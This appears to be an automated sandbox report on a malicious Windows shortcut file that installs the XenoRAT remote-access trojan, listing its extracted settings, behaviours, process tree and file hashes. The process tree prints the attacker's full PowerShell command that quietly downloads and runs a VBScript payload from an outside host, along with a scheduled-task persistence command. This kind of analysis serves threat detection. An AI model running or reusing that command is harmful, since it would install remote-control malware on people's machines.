Analysis
-
max time kernel
144s -
max time network
148s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
10-12-2024 03:51
Static task
static1
Behavioral task
behavioral1
Sample
ea254e085f81b5d580391f4fab6ce4c462cd66485e7ef42a49f9f12ab158a362.lnk
Resource
win7-20241023-en
General
-
Target
ea254e085f81b5d580391f4fab6ce4c462cd66485e7ef42a49f9f12ab158a362.lnk
-
Size
2KB
-
MD5
17af012abc0e526f7d02932f5a39d9db
-
SHA1
5df75915751923ef2ec5226e129b5107ec5ee56a
-
SHA256
ea254e085f81b5d580391f4fab6ce4c462cd66485e7ef42a49f9f12ab158a362
-
SHA512
af0fd0d4be8f3db60f122e37d1fe34ff0aeb066205b83aa13c128d0c3c4828651dee9774c9ef0413ae8f3eb65fa62f54054f830ee4aae33a07206086859a5c83
Malware Config
Extracted
https://www.stipamana.com/vbsznjgzfzgolnzdgh/tydthcgfhjdfhsfghxffsjhx/vbfdhydjyfjfxhgjhxgh/pafdfgzdf.vbs
Extracted
xenorat
dns.stipamana.com
Xeno_rat_nd8912d
-
delay
12000
-
install_path
appdata
-
port
4567
-
startup_name
mrec
Signatures
-
Detect XenoRat Payload 1 IoCs
resource yara_rule behavioral2/memory/884-103-0x0000000000400000-0x0000000000412000-memory.dmp family_xenorat -
Xenorat family
-
Blocklisted process makes network request 2 IoCs
flow pid Process 10 3636 powershell.exe 14 3888 WScript.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
pid Process 3636 powershell.exe -
Downloads MZ/PE file
-
Office macro that triggers on suspicious action 1 IoCs
Office document macro which triggers in special circumstances - often malicious.
resource yara_rule behavioral2/files/0x0008000000023c99-37.dat office_macro_on_action -
resource behavioral2/files/0x0008000000023c99-37.dat -
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation KKSTV.exe Key value queried \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation cmd.exe -
Executes dropped EXE 8 IoCs
pid Process 2316 KKSTV.exe 884 KKSTV.exe 2408 KKSTV.exe 2372 KKSTV.exe 2008 KKSTV.exe 2416 KKSTV.exe 2432 KKSTV.exe 4408 KKSTV.exe -
Suspicious use of SetThreadContext 6 IoCs
description pid Process procid_target PID 2316 set thread context of 884 2316 KKSTV.exe 92 PID 2316 set thread context of 2408 2316 KKSTV.exe 93 PID 2316 set thread context of 2372 2316 KKSTV.exe 94 PID 2008 set thread context of 2416 2008 KKSTV.exe 96 PID 2008 set thread context of 2432 2008 KKSTV.exe 97 PID 2008 set thread context of 4408 2008 KKSTV.exe 98 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 1 IoCs
pid pid_target Process procid_target 3840 2432 WerFault.exe 97 -
System Location Discovery: System Language Discovery 1 TTPs 8 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language KKSTV.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language KKSTV.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language KKSTV.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language KKSTV.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language KKSTV.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language KKSTV.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language KKSTV.exe -
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WINWORD.EXE Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WINWORD.EXE -
Enumerates system info in registry 2 TTPs 3 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WINWORD.EXE -
Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 4860 schtasks.exe -
Script User-Agent 1 IoCs
Uses user-agent string associated with script host/environment.
description flow ioc HTTP User-Agent header 14 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) -
Suspicious behavior: AddClipboardFormatListener 2 IoCs
pid Process 2364 WINWORD.EXE 2364 WINWORD.EXE -
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 3636 powershell.exe 3636 powershell.exe -
Suspicious use of AdjustPrivilegeToken 3 IoCs
description pid Process Token: SeDebugPrivilege 3636 powershell.exe Token: SeDebugPrivilege 2316 KKSTV.exe Token: SeDebugPrivilege 2008 KKSTV.exe -
Suspicious use of SetWindowsHookEx 7 IoCs
pid Process 2364 WINWORD.EXE 2364 WINWORD.EXE 2364 WINWORD.EXE 2364 WINWORD.EXE 2364 WINWORD.EXE 2364 WINWORD.EXE 2364 WINWORD.EXE -
Suspicious use of WriteProcessMemory 61 IoCs
description pid Process procid_target PID 224 wrote to memory of 3636 224 cmd.exe 83 PID 224 wrote to memory of 3636 224 cmd.exe 83 PID 3636 wrote to memory of 3888 3636 powershell.exe 84 PID 3636 wrote to memory of 3888 3636 powershell.exe 84 PID 2364 wrote to memory of 2316 2364 WINWORD.EXE 90 PID 2364 wrote to memory of 2316 2364 WINWORD.EXE 90 PID 2364 wrote to memory of 2316 2364 WINWORD.EXE 90 PID 2316 wrote to memory of 884 2316 KKSTV.exe 92 PID 2316 wrote to memory of 884 2316 KKSTV.exe 92 PID 2316 wrote to memory of 884 2316 KKSTV.exe 92 PID 2316 wrote to memory of 884 2316 KKSTV.exe 92 PID 2316 wrote to memory of 884 2316 KKSTV.exe 92 PID 2316 wrote to memory of 884 2316 KKSTV.exe 92 PID 2316 wrote to memory of 884 2316 KKSTV.exe 92 PID 2316 wrote to memory of 884 2316 KKSTV.exe 92 PID 2316 wrote to memory of 2408 2316 KKSTV.exe 93 PID 2316 wrote to memory of 2408 2316 KKSTV.exe 93 PID 2316 wrote to memory of 2408 2316 KKSTV.exe 93 PID 2316 wrote to memory of 2408 2316 KKSTV.exe 93 PID 2316 wrote to memory of 2408 2316 KKSTV.exe 93 PID 2316 wrote to memory of 2408 2316 KKSTV.exe 93 PID 2316 wrote to memory of 2408 2316 KKSTV.exe 93 PID 2316 wrote to memory of 2408 2316 KKSTV.exe 93 PID 2316 wrote to memory of 2372 2316 KKSTV.exe 94 PID 2316 wrote to memory of 2372 2316 KKSTV.exe 94 PID 2316 wrote to memory of 2372 2316 KKSTV.exe 94 PID 2316 wrote to memory of 2372 2316 KKSTV.exe 94 PID 2316 wrote to memory of 2372 2316 KKSTV.exe 94 PID 2316 wrote to memory of 2372 2316 KKSTV.exe 94 PID 2316 wrote to memory of 2372 2316 KKSTV.exe 94 PID 2316 wrote to memory of 2372 2316 KKSTV.exe 94 PID 2372 wrote to memory of 2008 2372 KKSTV.exe 95 PID 2372 wrote to memory of 2008 2372 KKSTV.exe 95 PID 2372 wrote to memory of 2008 2372 KKSTV.exe 95 PID 2008 wrote to memory of 2416 2008 KKSTV.exe 96 PID 2008 wrote to memory of 2416 2008 KKSTV.exe 96 PID 2008 wrote to memory of 2416 2008 KKSTV.exe 96 PID 2008 wrote to memory of 2416 2008 KKSTV.exe 96 PID 2008 wrote to memory of 2416 2008 KKSTV.exe 96 PID 2008 wrote to memory of 2416 2008 KKSTV.exe 96 PID 2008 wrote to memory of 2416 2008 KKSTV.exe 96 PID 2008 wrote to memory of 2416 2008 KKSTV.exe 96 PID 2008 wrote to memory of 2432 2008 KKSTV.exe 97 PID 2008 wrote to memory of 2432 2008 KKSTV.exe 97 PID 2008 wrote to memory of 2432 2008 KKSTV.exe 97 PID 2008 wrote to memory of 2432 2008 KKSTV.exe 97 PID 2008 wrote to memory of 2432 2008 KKSTV.exe 97 PID 2008 wrote to memory of 2432 2008 KKSTV.exe 97 PID 2008 wrote to memory of 2432 2008 KKSTV.exe 97 PID 2008 wrote to memory of 2432 2008 KKSTV.exe 97 PID 2008 wrote to memory of 4408 2008 KKSTV.exe 98 PID 2008 wrote to memory of 4408 2008 KKSTV.exe 98 PID 2008 wrote to memory of 4408 2008 KKSTV.exe 98 PID 2008 wrote to memory of 4408 2008 KKSTV.exe 98 PID 2008 wrote to memory of 4408 2008 KKSTV.exe 98 PID 2008 wrote to memory of 4408 2008 KKSTV.exe 98 PID 2008 wrote to memory of 4408 2008 KKSTV.exe 98 PID 2008 wrote to memory of 4408 2008 KKSTV.exe 98 PID 2408 wrote to memory of 4860 2408 KKSTV.exe 108 PID 2408 wrote to memory of 4860 2408 KKSTV.exe 108 PID 2408 wrote to memory of 4860 2408 KKSTV.exe 108
Processes
-
C:\Windows\system32\cmd.execmd /c C:\Users\Admin\AppData\Local\Temp\ea254e085f81b5d580391f4fab6ce4c462cd66485e7ef42a49f9f12ab158a362.lnk1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:224 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass jqbinrdfgfdhozhdfboopntjfmdjtgfd -WindowStyle -Command hiddeN consent.exe;(new-object System.Net.WebClient).DownloadFile('https://www.stipamana.com/vbsznjgzfzgolnzdgh/tydthcgfhjdfhsfghxffsjhx/vbfdhydjyfjfxhgjhxgh/pafdfgzdf.vbs','pafdfgz.vbs');./'pafdfgz.vbs';(get-item 'pafdfgz.vbs').Attributes += 'Hidden';2⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3636 -
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\pafdfgz.vbs"3⤵
- Blocklisted process makes network request
PID:3888
-
-
-
C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /Automation -Embedding1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2364 -
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\KKSTV.exe"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\KKSTV.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2316 -
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\KKSTV.exeC:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\KKSTV.exe3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:884
-
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\KKSTV.exeC:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\KKSTV.exe3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2408 -
C:\Windows\SysWOW64\schtasks.exe"schtasks.exe" /Create /TN "mrec" /XML "C:\Users\Admin\AppData\Local\Temp\tmpC6.tmp" /F4⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:4860
-
-
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\KKSTV.exeC:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\KKSTV.exe3⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2372 -
C:\Users\Admin\AppData\Roaming\UpdateManager\KKSTV.exe"C:\Users\Admin\AppData\Roaming\UpdateManager\KKSTV.exe"4⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2008 -
C:\Users\Admin\AppData\Roaming\UpdateManager\KKSTV.exeC:\Users\Admin\AppData\Roaming\UpdateManager\KKSTV.exe5⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:2416
-
-
C:\Users\Admin\AppData\Roaming\UpdateManager\KKSTV.exeC:\Users\Admin\AppData\Roaming\UpdateManager\KKSTV.exe5⤵
- Executes dropped EXE
PID:2432 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2432 -s 806⤵
- Program crash
PID:3840
-
-
-
C:\Users\Admin\AppData\Roaming\UpdateManager\KKSTV.exeC:\Users\Admin\AppData\Roaming\UpdateManager\KKSTV.exe5⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:4408
-
-
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 404 -p 2432 -ip 24321⤵PID:4788
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
706B
MD5d95c58e609838928f0f49837cab7dfd2
SHA155e7139a1e3899195b92ed8771d1ca2c7d53c916
SHA2560407c814aef0d62aec7fd39b7c2f614746f0d8ff41f8ef957736f520f14b0339
SHA512405310b29a833604c6627063bfdcf055a197e01f633ef21da238f1a6415a02e21315d689b4a6669db23e82152bed6f3492afb60963e6b2a0e9bb2ac09a480b5d
-
Filesize
245KB
MD5f883b260a8d67082ea895c14bf56dd56
SHA17954565c1f243d46ad3b1e2f1baf3281451fc14b
SHA256ef4835db41a485b56c2ef0ff7094bc2350460573a686182bc45fd6613480e353
SHA512d95924a499f32d9b4d9a7d298502181f9e9048c21dbe0496fa3c3279b263d6f7d594b859111a99b1a53bd248ee69b867d7b1768c42e1e40934e0b990f0ce051e
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
10KB
MD5087bcef76143b81090deef4ee4679995
SHA16ebd4fd212d0583157ae03bb0eb5841c53e281fc
SHA25687334eb3f39cffdfeed453f67a7c338fe378b75c49946451ca1a0e4e151bba00
SHA512b2f93705760d4d1cf5fe0ac354100916d16b6c4fd62117254238a600aabe6257fc791f1ce498bd2d0cfdd47e19f304dc5a68a06b7958658f34859afaa582ed4d
-
Filesize
1KB
MD5276d8f1b7e05feed45e456295f52e4da
SHA1902d0fcb164b5ad255185b04558618b51b824cf8
SHA25606483d2faa061e06693dba1bb7f645fee992f94ffb713e6ebf30ae50ab288b5c
SHA512893ec4b4358250389b6c7764145ef0aca8de5429ba983534d2205796296f747fcb20567ec99a6b9ccaef3903d795986b32572a7e6e5d9cb3e08b876c0f01db95
-
Filesize
195KB
MD513326ed69d36aaa385c5eba9fa6e5cc2
SHA166946fa69204b91787c7eabb91c1fd8452b1cc24
SHA2563106e90067456404a9f3e768ce3b60de6ae91fa2be664255ad6fe86c3f87e67d
SHA51239e5df1db48b1afe1c2bf7f2b8ccfca38b0fd4c49dd04884299fcc8adc633e6171a8756bf9eca65ac37b59ce6ef4a3fb3c761848a94c04d9afe725a53d008edd
-
Filesize
16B
MD5d29962abc88624befc0135579ae485ec
SHA1e40a6458296ec6a2427bcb280572d023a9862b31
SHA256a91a702aab9b8dd722843d3d208a21bcfa6556dfc64e2ded63975de4511eb866
SHA5124311e87d8d5559248d4174908817a4ddc917bf7378114435cf12da8ccb7a1542c851812afbaf7dc106771bdb2e2d05f52e7d0c50d110fc7fffe4395592492c2f
-
Filesize
173KB
MD594a7e3859c2e4238421cdfe73d49603c
SHA103f03c5b5d8cf362aa52b9e793e7be398d779c21
SHA256639135eb69333aba7ecb762072d8bef1d2db83e54edbe627dd223039142b8c91
SHA51274048463606f7017bd8bd3c92773edde5a406247c5ea437b8ee580a3d9e65eb755aa44de466fc2aabef8b9a67c40163afeb3df9bc9fb35f8afe20814d5de85b5